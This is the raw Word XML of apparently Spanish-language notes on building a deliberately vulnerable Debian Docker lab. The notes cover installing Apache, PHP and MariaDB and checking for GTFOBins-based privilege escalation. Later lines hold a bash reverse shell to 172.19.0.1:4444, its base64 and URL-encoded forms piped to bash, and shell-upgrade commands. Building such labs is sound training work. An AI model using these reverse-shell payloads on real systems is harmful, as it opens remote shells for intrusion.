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 xml:space="preserve">docker run --name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE6801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pruebasDebian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --hostname </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE6801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>altair</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 80:80 -e LANG=C.UTF-8 -it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE6801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>debian:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00DE6801"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Pr="00BD033B" w:rsidRDefault="00DE6801">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD033B">
        <w:t>despues</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD033B">
        <w:t xml:space="preserve"> instalo apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F3D4CD" w14:textId="5F0EF9A0" w:rsidR="00DE6801" w:rsidRPr="009B73F5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00DE6801" w:rsidRPr="00BD033B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.digitalocean.com/community/tutorials/how-to-install-the-apache-web-server-on-debian-11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31889466" w14:textId="2F78DA1D" w:rsidR="000B2A4D" w:rsidRDefault="000B2A4D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B2A4D">
        <w:t>Tambien</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B2A4D">
        <w:t xml:space="preserve"> instalo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B2A4D">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B2A4D">
        <w:t xml:space="preserve"> con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882CB07" w14:textId="1CB387B6" w:rsidR="005768E9" w:rsidRPr="009B73F5" w:rsidRDefault="000B2A4D" w:rsidP="00576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sudo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apt-get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libapache2-mod-php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498F4A8" w14:textId="77777777" w:rsidR="00DE6801" w:rsidRPr="009B73F5" w:rsidRDefault="00DE6801"/>
    <w:p w14:paraId="63AC6E31" w14:textId="77777777" w:rsidR="00836F2E" w:rsidRPr="009B73F5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Subido el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79896707" w14:textId="3A25C910" w:rsidR="00DE6801" w:rsidRDefault="00836F2E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pruebasDebian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ibantxu12/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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debian_vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="392CF41E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FB9B96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8E91A7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EEFF1E" w14:textId="21CB586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 problema que me encuentro es como instalar las bases de datos en el servidor. Mi idea principal era crear una red con otra maquina y su base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCDD178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DD621A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54B29E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096EEA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7E1905" w14:textId="73711CE9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He pasado un momento a la parte de escalada de privilegios,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wget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me he descargado el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ctfobins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para los archivos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sudo, luego he filtrado para que aparezcan solo los nombres de los archivos con grep, y por último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creado un script que busca todos esos nombres en la maquina con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find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lo he ejecutado en mi maquina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debian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y he filtrado todos los archivos que no nos sirven, los de la carpeta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proc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por ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE77C2" w14:textId="48D3F91E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708DFA6" wp14:editId="7A789E6B">
            <wp:extent cx="5105400" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="896421305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1305" name="Imagen 1" descr="Pantalla negra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54" w14:textId="798628AC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7AA2283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AF6511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8A85C0" w14:textId="223A8EDC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Me estoy encontrando con muchos problemas para instalar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mariadb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</w:t>
      </w:r>
      <w:r w:rsidR="000374F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tenido que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crear un usuario y darle los permisos necesarios en varias carpetas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para poder ejecutar el comando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mysqld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ya que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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en Docker no funciona bien.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BF4C7" w14:textId="531099CC" w:rsidR="0078323B" w:rsidRPr="00BA6022" w:rsidRDefault="00812FC7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He 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usado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service start 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mariadb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E233202" w14:textId="77777777" w:rsidR="0078323B" w:rsidRPr="00BA6022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A21C536" w14:textId="77777777" w:rsidR="000560B6" w:rsidRPr="00BA6022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28D5971" w14:textId="77777777" w:rsidR="000560B6" w:rsidRPr="00BA6022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AA6ED27" w14:textId="71D9078F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echo "bash -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&gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/172.19.0.1/4444 0&gt;&amp;1" | base64 -w 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F4F9F" w14:textId="77777777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8570C57" w14:textId="7B357493" w:rsidR="000560B6" w:rsidRPr="000560B6" w:rsidRDefault="000560B6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560B6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echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzQ0NDQgMD4mMQo=" | base64 -d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| bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28BC43" w14:textId="77777777" w:rsidR="008255A7" w:rsidRPr="00BA6022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9BB9B93" w14:textId="77777777" w:rsidR="008255A7" w:rsidRPr="00BA6022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ADDC571" w14:textId="18851021" w:rsidR="008255A7" w:rsidRPr="00BA6022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echo "YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xNzIuMTkuMC4xLzQ0NDQgMD4mMQo%3D" | base64 -d | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BACB20" w14:textId="77777777" w:rsidR="008255A7" w:rsidRPr="00BA6022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936E53C" w14:textId="5AC22E12" w:rsidR="008255A7" w:rsidRDefault="008255A7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script /dev/null -c bash   &gt;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control+z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stty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raw -echo;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fg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 reset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xterm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&gt;  export TERM=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xterm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&gt;   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008255A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rows 44 columns 184</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23491B2B" w14:textId="77777777" w:rsidR="00BA6022" w:rsidRDefault="00BA6022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03BF6AE" w14:textId="77777777" w:rsidR="00BA6022" w:rsidRDefault="00BA6022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9C5E96A" w14:textId="77777777" w:rsidR="00BA6022" w:rsidRDefault="00BA6022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C22BF3E" w14:textId="77777777" w:rsidR="00BA6022" w:rsidRDefault="00BA6022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89B258D" w14:textId="77777777" w:rsidR="00BA6022" w:rsidRDefault="00BA6022" w:rsidP="00825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22D6710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// Sweet Class Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D77FCA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// -------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E6450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A6B3BAF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// Chain elements like this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD949F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// [Customer]&lt;&gt;-orders*&gt;[Order]++-0..*&gt;[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LineItem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059B6EC2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[Main]-&gt;[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Maquina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36F4B788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[Main]-&gt;[Argumentos]-&gt;[Maquina]-&gt;[Vulnerabilidades]-&gt;[Herramientas]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531B8F1" w14:textId="77777777" w:rsidR="00BA6022" w:rsidRPr="00BA6022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Argumentos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]-&gt;[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Herramientas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620DC114" w14:textId="3F90DBE7" w:rsidR="00BA6022" w:rsidRPr="008255A7" w:rsidRDefault="00BA6022" w:rsidP="00BA6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Maquina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]-&gt;[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Herramientas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA602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2D0D30C0" w14:textId="77777777" w:rsidR="008255A7" w:rsidRPr="008255A7" w:rsidRDefault="008255A7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es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008255A7" w:rsidRPr="0082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0374FE"/>
    <w:rsid w:val="000560B6"/>
    <w:rsid w:val="000B2A4D"/>
    <w:rsid w:val="00155472"/>
    <w:rsid w:val="001722FC"/>
    <w:rsid w:val="00350ABA"/>
    <w:rsid w:val="003F5049"/>
    <w:rsid w:val="005768E9"/>
    <w:rsid w:val="005D4270"/>
    <w:rsid w:val="00611199"/>
    <w:rsid w:val="00647C63"/>
    <w:rsid w:val="006A471C"/>
    <w:rsid w:val="00727307"/>
    <w:rsid w:val="00732954"/>
    <w:rsid w:val="0078323B"/>
    <w:rsid w:val="00812FC7"/>
    <w:rsid w:val="008255A7"/>
    <w:rsid w:val="00836F2E"/>
    <w:rsid w:val="00940157"/>
    <w:rsid w:val="009B73F5"/>
    <w:rsid w:val="00AC43A4"/>
    <w:rsid w:val="00BA6022"/>
    <w:rsid w:val="00BD033B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15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-22T18:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-27T18:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>